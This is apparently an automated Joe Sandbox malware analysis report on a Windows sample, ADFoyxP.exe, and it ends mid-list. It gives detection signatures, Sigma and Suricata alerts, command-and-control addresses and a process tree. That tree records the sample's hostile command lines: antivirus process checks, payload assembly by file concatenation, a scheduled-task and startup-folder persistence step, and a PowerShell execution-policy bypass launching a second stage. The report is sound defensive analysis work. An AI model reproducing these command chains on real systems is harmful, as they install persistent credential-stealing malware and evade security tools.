Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ADFoyxP.exe

Overview

General Information

Sample name:ADFoyxP.exe
Analysis ID:1631942
MD5:45c1abfb717e3ef5223be0bfc51df2de
SHA1:4c074ea54a1749bf1e387f611dea0d940deea803
SHA256:b01d928331e2b87a961b1a5953bc7dbb8d757c250f1343d731e3b6bb20591243
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Publisher Attachment File Dropped In Suspicious Location
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64native
  • ADFoyxP.exe (PID: 2068 cmdline: "C:\Users\user\Desktop\ADFoyxP.exe" MD5: 45C1ABFB717E3EF5223BE0BFC51DF2DE)
    • cmd.exe (PID: 5876 cmdline: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • expand.exe (PID: 708 cmdline: expand Go.pub Go.pub.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
      • tasklist.exe (PID: 5724 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3068 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7848 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7832 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6892 cmdline: cmd /c md 353090 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7388 cmdline: extrac32 /Y /E Really.pub MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 3536 cmdline: findstr /V "posted" Good MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7508 cmdline: cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 8908 cmdline: cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Seat.com (PID: 7468 cmdline: Seat.com m MD5: 62D09F076E6E0240548C2F837536A46A)
        • cmd.exe (PID: 6580 cmdline: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • schtasks.exe (PID: 5724 cmdline: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
        • cmd.exe (PID: 7660 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • RegAsm.exe (PID: 2584 cmdline: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • cmd.exe (PID: 8300 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • powershell.exe (PID: 8416 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • curcuma.exe (PID: 8696 cmdline: "C:\Users\user\AppData\Local\Temp\curcuma.exe" MD5: 38C5F131B71B5FDC82CFBA091A2D34A0)
                • chrome.exe (PID: 8680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: BB7C48CDDDE076E7EB44022520F40F77)
                  • chrome.exe (PID: 1840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2184,i,15394741629772577023,2250770724390570129,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2204 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
                • msedge.exe (PID: 2312 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
                  • msedge.exe (PID: 2796 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,7206107532581912577,15538010115052324354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
      • choice.exe (PID: 696 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 8432 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • TradeHub.com (PID: 7688 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 2376 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • TradeHub.com (PID: 1980 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • msedge.exe (PID: 2388 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • msedge.exe (PID: 5252 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • identity_helper.exe (PID: 2824 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8 MD5: 688D7C201AD85A9C6EDAFDC457E53219)
    • identity_helper.exe (PID: 6840 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8 MD5: 688D7C201AD85A9C6EDAFDC457E53219)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ParentCommandLine: Seat.com m, ParentImage: C:\Users\user\AppData\Local\Temp\353090\Seat.com, ParentProcessId: 7468, ParentProcessName: Seat.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ProcessId: 2584, ProcessName: RegAsm.exe
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6580, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 5724, ProcessName: schtasks.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8300, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , ProcessId: 8416, ProcessName: powershell.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1352, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 8432, ProcessName: wscript.exe
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ParentCommandLine: Seat.com m, ParentImage: C:\Users\user\AppData\Local\Temp\353090\Seat.com, ParentProcessId: 7468, ParentProcessName: Seat.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ProcessId: 2584, ProcessName: RegAsm.exe
Sigma detected: Publisher Attachment File Dropped In Suspicious Location
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\ADFoyxP.exe, ProcessId: 2068, TargetFilename: C:\Users\user\AppData\Local\Temp\Argentina.pub
Sigma detected: Suspicious Schtasks From Env Var Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6580, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 5724, ProcessName: schtasks.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1352, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 8432, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8300, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , ProcessId: 8416, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Search for Antivirus process
Source: Process startedAuthor: Joe Security: Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5876, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 7832, ProcessName: findstr.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-07T17:49:56.573527+010020283713Unknown Traffic192.168.11.2049725104.21.96.1443TCP
2025-03-07T17:49:58.132706+010020283713Unknown Traffic192.168.11.2049726104.21.96.1443TCP
2025-03-07T17:49:59.284228+010020283713Unknown Traffic192.168.11.2049727104.21.96.1443TCP
2025-03-07T17:50:30.040005+010020283713Unknown Traffic192.168.11.2062579104.21.96.1443TCP
2025-03-07T17:50:33.786026+010020283713Unknown Traffic192.168.11.2060783104.21.96.1443TCP
2025-03-07T17:50:35.008944+010020283713Unknown Traffic192.168.11.2051492104.21.96.1443TCP
2025-03-07T17:50:36.203959+010020283713Unknown Traffic192.168.11.2057795104.21.96.1443TCP
2025-03-07T17:50:37.280210+010020283713Unknown Traffic192.168.11.2060838104.21.96.1443TCP
2025-03-07T17:50:39.601107+010020283713Unknown Traffic192.168.11.2060839104.21.96.1443TCP
2025-03-07T17:50:41.614676+010020283713Unknown Traffic192.168.11.2060840104.21.96.1443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-07T17:49:30.092177+010028424781Malware Command and Control Activity Detected45.95.18.1734449192.168.11.2049722TCP
2025-03-07T17:49:48.821228+010028424781Malware Command and Control Activity Detected45.95.18.1734449192.168.11.2049724TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: ADFoyxP.exeReversingLabs: Detection: 13%
Source: ADFoyxP.exeVirustotal: Detection: 35%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.9% probability

Bitcoin Miner

barindex
Found strings related to Crypto-Mining
Source: curcuma.exe, 00000025.00000003.1791060166.0000012CE2C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jsecoin.com
Source: curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: coinhive.com/
Source: ADFoyxP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\scoped_dir8680_1554559384
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_8680_1352400022
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:62579 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:51492 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:57795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60838 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60840 version: TLS 1.2
Source: ADFoyxP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ad_prod.pdb\36C00AF489401A26639ABBA698DE76062* source: curcuma.exe, 00000025.00000003.1706127726.0000012CDEE4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: curcuma.exe, 00000025.00000003.1914137812.0000012CDEE83000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665087028.0000012CDEE65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: K\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbB source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local Statees source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: FC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\crobat\DCG source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000001A.00000000.1139585263.0000000000502000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: ntdll.pdbUGP source: curcuma.exe, 00000025.00000002.2067051232.0000012CE02AE000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062028723.0000012CDF0B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067503246.0000012CE04AA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070281440.0000012CE10A9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064043968.0000012CDF6BA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2063400094.0000012CDF4B9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068870239.0000012CE0AAC000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070779946.0000012CE12A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067953052.0000012CE06A4000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062689732.0000012CDF2B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071810365.0000012CE16A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069313603.0000012CE0CA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066142942.0000012CDFEA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 